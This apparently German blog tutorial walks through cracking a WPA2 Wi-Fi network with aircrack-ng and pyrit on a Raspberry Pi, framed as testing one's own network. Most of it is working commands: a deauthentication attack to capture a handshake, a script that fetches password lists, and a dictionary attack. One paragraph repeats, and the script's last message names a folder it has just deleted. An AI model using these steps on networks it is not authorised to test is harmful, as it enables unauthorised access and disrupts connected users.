WLAN (WPA2, WEP) knacken

Eines vorweg: Das WLAN des Nachbarn oder anderen zu knacken ist illegal! Es geht in diesem Artikel nur darum,

die Sicherheit des Systems aufzuzeigen und die damit verbundenen Gefahren hinzuweisen.

 

Früher wurden WLANs mit der WEP Verschlüsselung abgesichert. Diese lässt sich in wenigen Sekunden aushebeln und

ist somit nicht mehr sicher. Heutige Netze sind mindestens mit WPA2 gesichert. Hier ist es nicht mehr so einfach und

man ist auf das probieren der Kennwörter angewiesen. Wird also ein Schlüssel verwendet, der nicht in einer Passwortliste

zu finden ist und der entsprechend komplex ist, ist der WLAN Betreiber ziemlich sicher. 

 

Mein Setup:

Raspberry PI

ALFA AWUS USB WLAN Adapter

 

Vorraussetzung:

Fertig installiertes Raspian auf dem PI

 

Installation Aircrack-ng

Show/Hidden bash code

View source
 
 
apt-get update
 
apt-get install aircrack-ng pyrit unp
 
 
  

Monitormode der Wlankarte (bei mir wlan0) starten.

Show/Hidden bash code

View source
 
 
 
airmon-ng start wlan0
 
 
 
  

Wlans finden

Show/Hidden bash code

View source
 
 
 
airodump-ng mon0
 
 
 
  

Nun sucht man sich sein eigenes Test-Wlan heraus. Für den Test könnte man auch einen einfachen Schlüssel verwenden (z.B. 1234567890).

Benötigt wird die Mac-Adresse und der Kanal. Diese sind im Code zu ersetzen.

Show/Hidden bash code

View source
 
 
 
airodump-ng --channel 1 --bssid 00:11:22:33:44:55 --write wpa2-dump mon0
 
 
 
 
Jetzt kommt der wichtig Teil. Um den Key erraten zu können, benötigt man einen so genannten Handshake. 

Man könnte nun einfach warten, bis sich ein neues Gerät mit dem WLAN verbindet, eines trennen und wieder verbinden, oder es auf die "harte Tour" machen ;)

Dafür einfach eine zweite Konsole öffnen und das eintippen. Wichtig auch hier wieder die MAC ersetzen.

Show/Hidden bash code

View source
 
 
 
aireplay-ng --deauth 5 -a 00:11:22:33:44:55 mon0
 
 
 
Auf der ersten Konsole wird von airmon auch direkt angezeigt wenn ein Handshake zu Stande kam.

Man könnte nun einfach warten, bis sich ein neues Gerät mit dem WLAN verbindet, eines trennen und wieder verbinden, oder es auf die "harte Tour" machen ;)

Dafür einfach eine zweite Konsole öffnen und das eintippen. Wichtig auch hier wieder die MAC ersetzen.

Ist das geschafft gehts weiter.

Show/Hidden bash code

View source
 
 
 
STRG+C
airmon-ng stop mon0
 
 
 
 
Jetzt geht es mit pyrit weiter. Hier werden die Pakete auf die Handshakes reduziert.

Show/Hidden bash code

View source
 
 
 
pyrit -r wpa2-dump-01.cap -o handshakes.cap strip
 
 
 
Nun benötigen wir eine Passwortliste. Ich habe ein Script gebaut, welches diese zusammenstellen kann. Dieses einfach in eine neue Datei einfügen (vim) und ausführbar (chmod +x) machen.

Show/Hidden bash code

View source
 
 
 
#!/bin/bash
 
cd /home/pi
 
mkdir passwords && cd passwords
 
git init
 
git remote add -f origin https://github.com/danielmiessler/SecLists.git
 
git config core.sparseCheckout true
 
echo "Passwords/" >> .git/info/sparse-checkout
 
git pull origin master
 
mv /home/pi/passwords/Passwords/* /home/pi/passwords
 
rmdir /home/pi/passwords/Passwords
 
cd /home/pi/passwords
 
unp *
 
tar cvfz pwdb.tar.gz *
 
mv pwdb.tar.gz /home/pi/
 
rm -r /home/pi/passwords
 
echo "Passwords stored at /home/pi/passwords"
 
 
 
 
Jetzt ist unser Passwortdatenbank vorhanden und es geht los mit der Brute force Attacke.
Das kann sehr lange dauern und ich empfehle das ausführen in einem Screen.

Show/Hidden bash code

View source
 
 
 
pyrit -r handshakes.cap -i /home/pi/pwdb.tar.gz attack_passthrough
 
 
 
Etwa 25 Kaffee später sollte dann im Idealfall folgendes zu lesen sein:

Show/Hidden bash code

View source
 
 
 
The password is '1234567890'.